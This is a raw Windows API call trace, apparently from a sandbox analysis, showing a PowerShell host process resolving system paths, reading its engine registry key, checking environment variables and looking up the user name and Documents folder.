	[0536.292] CoTaskMemFree (pv=0x3ba790) 
	[0536.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.293] SetErrorMode (uMode=0x1) returned 0x1
	[0536.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cff0 | out: lpFileInformation=0x12cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.293] SetErrorMode (uMode=0x1) returned 0x1
	[0536.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.293] SetErrorMode (uMode=0x1) returned 0x1
	[0536.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cff0 | out: lpFileInformation=0x12cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.293] SetErrorMode (uMode=0x1) returned 0x1
	[0536.294] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0536.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.294] CoTaskMemFree (pv=0x3ba790) 
	[0536.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.303] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0536.303] SetErrorMode (uMode=0x1) returned 0x1
	[0536.303] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0536.303] SetErrorMode (uMode=0x1) returned 0x1
	[0536.303] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0536.303] SetErrorMode (uMode=0x1) returned 0x1
	[0536.304] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0536.304] SetErrorMode (uMode=0x1) returned 0x1
	[0536.304] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0536.304] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0536.304] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.304] SetErrorMode (uMode=0x1) returned 0x1
	[0536.304] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0536.304] SetErrorMode (uMode=0x1) returned 0x1
	[0536.304] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.304] SetErrorMode (uMode=0x1) returned 0x1
	[0536.304] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0536.305] SetErrorMode (uMode=0x1) returned 0x1
	[0536.305] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.305] SetErrorMode (uMode=0x1) returned 0x1
	[0536.305] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.305] SetErrorMode (uMode=0x1) returned 0x1
	[0536.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.305] SetErrorMode (uMode=0x1) returned 0x1
	[0536.305] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cfb0 | out: lpFileInformation=0x12cfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.305] SetErrorMode (uMode=0x1) returned 0x1
	[0536.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.306] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.306] SetErrorMode (uMode=0x1) returned 0x1
	[0536.306] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cff0 | out: lpFileInformation=0x12cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0536.306] SetErrorMode (uMode=0x1) returned 0x1
	[0536.306] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.306] SetErrorMode (uMode=0x1) returned 0x1
	[0536.307] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12cff0 | out: lpFileInformation=0x12cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0536.307] SetErrorMode (uMode=0x1) returned 0x1
	[0536.307] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.307] SetErrorMode (uMode=0x1) returned 0x1
	[0536.307] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cff0 | out: lpFileInformation=0x12cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.307] SetErrorMode (uMode=0x1) returned 0x1
	[0536.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.307] SetErrorMode (uMode=0x1) returned 0x1
	[0536.307] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12cff0 | out: lpFileInformation=0x12cff0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.308] SetErrorMode (uMode=0x1) returned 0x1
	[0536.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0536.313] SetErrorMode (uMode=0x1) returned 0x1
	[0536.313] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d2b0 | out: lpFileInformation=0x12d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0536.313] SetErrorMode (uMode=0x1) returned 0x1
	[0536.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0536.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0536.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0536.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0537.288] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0537.288] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d618 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d618) returned 0x1
	[0537.289] CoTaskMemFree (pv=0x1b7dd910) 
	[0537.289] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0537.289] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d658 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d658) returned 1
	[0537.290] CoTaskMemFree (pv=0x34c760) 
	[0537.291] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e875d0*="Available", lpRawData=0x2e87360) returned 1
	[0537.292] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0537.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.292] CoTaskMemFree (pv=0x3ba790) 
	[0537.294] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0537.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.294] CoTaskMemFree (pv=0x3ba790) 
	[0537.297] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0537.297] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0537.297] CoTaskMemFree (pv=0x3ba790) 
	[0537.297] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0537.297] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0537.297] CoTaskMemFree (pv=0x3ba790) 
	[0537.301] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d638 | out: phkResult=0x12d638*=0x388) returned 0x0
	[0537.301] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d5bc, lpData=0x0, lpcbData=0x12d5b8*=0x0 | out: lpType=0x12d5bc*=0x1, lpData=0x0, lpcbData=0x12d5b8*=0x56) returned 0x0
	[0537.301] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c1360
	[0537.301] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d58c, lpData=0x1b7c1360, lpcbData=0x12d588*=0x56 | out: lpType=0x12d58c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d588*=0x56) returned 0x0
	[0537.301] CoTaskMemFree (pv=0x1b7c1360) 
	[0537.301] RegCloseKey (hKey=0x388) returned 0x0
	[0537.303] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0537.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.303] CoTaskMemFree (pv=0x3ba790) 
	[0538.381] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.381] CoTaskMemFree (pv=0x3ba790) 
	[0538.393] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.393] CoTaskMemFree (pv=0x3ba790) 
	[0538.394] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.394] CoTaskMemFree (pv=0x3ba790) 
	[0538.394] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.394] CoTaskMemFree (pv=0x3ba790) 
	[0538.395] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.395] CoTaskMemFree (pv=0x3ba790) 
	[0538.402] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.402] CoTaskMemFree (pv=0x3ba790) 
	[0538.403] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0538.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.403] CoTaskMemFree (pv=0x3ba790) 
	[0539.416] CoTaskMemAlloc (cb=0x104) returned 0x3ba790
	[0539.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0539.416] CoTaskMemFree (pv=0x3ba790) 
	[0541.535] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3ba8a0
	[0541.538] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3ba9b0
	[0546.294] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0546.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.294] CoTaskMemFree (pv=0x3baac0) 
	[0546.305] CoTaskMemAlloc (cb=0x104) returned 0x3baac0
	[0546.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3baac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0546.305] CoTaskMemFree (pv=0x3baac0) 
	[0546.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0546.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0546.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0546.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0547.130] VirtualQuery (in: lpAddress=0x12b940, lpBuffer=0x12c800, dwLength=0x30 | out: lpBuffer=0x12c800*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0547.133] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d798 | out: phkResult=0x12d798*=0x394) returned 0x0
	[0547.134] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d71c, lpData=0x0, lpcbData=0x12d718*=0x0 | out: lpType=0x12d71c*=0x1, lpData=0x0, lpcbData=0x12d718*=0x56) returned 0x0
	[0547.134] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e2b70
	[0547.134] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6ec, lpData=0x1b7e2b70, lpcbData=0x12d6e8*=0x56 | out: lpType=0x12d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d6e8*=0x56) returned 0x0
	[0547.134] CoTaskMemFree (pv=0x1b7e2b70) 
	[0547.134] RegCloseKey (hKey=0x394) returned 0x0
	[0547.134] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d798 | out: phkResult=0x12d798*=0x394) returned 0x0
	[0547.134] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d71c, lpData=0x0, lpcbData=0x12d718*=0x0 | out: lpType=0x12d71c*=0x1, lpData=0x0, lpcbData=0x12d718*=0x56) returned 0x0
	[0547.134] CoTaskMemAlloc (cb=0x5a) returned 0x1b7e2b70
	[0547.134] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6ec, lpData=0x1b7e2b70, lpcbData=0x12d6e8*=0x56 | out: lpType=0x12d6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d6e8*=0x56) returned 0x0
	[0547.134] CoTaskMemFree (pv=0x1b7e2b70) 
	[0547.135] RegCloseKey (hKey=0x394) returned 0x0
	[0547.135] CoTaskMemAlloc (cb=0x20c) returned 0x3c67d0
	[0547.135] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3c67d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0547.135] CoTaskMemFree (pv=0x3c67d0) 
	[0547.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d350, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0547.135] CoTaskMemAlloc (cb=0x20c) returned 0x3c67d0
	[0547.135] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3c67d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0547.135] CoTaskMemFree (pv=0x3c67d0) 
